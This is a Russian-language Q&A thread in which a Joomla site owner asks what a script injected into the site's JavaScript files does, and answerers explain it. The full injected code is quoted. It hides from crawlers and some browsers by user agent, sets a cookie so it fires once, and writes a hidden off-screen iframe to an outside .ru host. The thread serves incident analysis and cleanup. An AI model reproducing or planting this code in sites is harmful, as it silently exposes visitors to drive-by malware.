# Какие функции выполняет этот js скрипт?

Tags: joomla, взлом, javascript

В Админке Джумлы перестали работать кнопки (Сохранить материал, отмена и пр.). В общем **js** отказывался работать.
Как выяснялось, многие js файлы были дополнены (или заменены сами файлы) следующим кодом, из-за которого и появлялись ошибки:

```
//beleiad9
(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function zzz_check_ua(){
var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK';
blackList = blackList.split('|');
var blackUA = false;
for (var i in blackList) {
if (stripos(navigator.userAgent, blackList[i])!==false) {
blackUA = true;
break;
}
}
return blackUA;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
var cookie = getCookie('global7rufahu3');
if (cookie == undefined) {
setCookie('global7rufahu3', true, 86400);
document.write('<iframe src="http://babbleware.ru/jfas7u.r2whgf7?default" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>');
}
};
})();
//kolamne817/*
```

После восстановления оригинальных файлов, все прекрасно заработало.

Вопрос: для чего этот код, какова его основная задача? Как понимаю, не из-за благих целей его разместили. К сожалению мало чего понимаю в js, поэтому обращаюсь к профессионалом.

Answer (score 2, accepted):

Если очень кратко - функция `zzz_check_ua` проверяет по UserAgent'у нужно ли заражать страницу или нет. К примеру, на андроидах, айпедах и линукс машинах она не будет работать.

Само заражение - вставка iframe с ссылкой на страницу. Подозреваю, что по ссылке какой-нибудь троян или дропппер. Я curl'ом смотрел - она ведет на yahoo!. Но думаю, мой курл плохо под IE зашифровался.

Comment: Правильно ли я понял, что, как таковой опасности для работоспособности jooml'ы этот код не представляет (за исключением ошибок js)? 
И в любом случае необходимо как можно скорей найти и заменить эти "зараженные" файлы?
И может ли из-за этого Гугл или Яндекс заблокировать сайт в выдачи поиска как "Потенциально опасного"?

Comment: для самой joomla он скорее всего безвредный. Но кто знает, куда он может перенаправлять.

> И в любом случае необходимо как можно скорей найти и заменить эти "зараженные" файлы? 

да, и проверить другие файлы. Можно и пароли поменять.

> И может ли из-за этого Гугл или Яндекс заблокировать сайт в выдачи поиска как "Потенциально опасного"?

легко.

Answer (score 1):

Если ваш браузер не попадает в список:

```
Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK
```

И куки не существует:

```
global7rufahu3
```

то вставляем вредоносный [iframe](http://htmlbook.ru/html/iframe) в тело документа.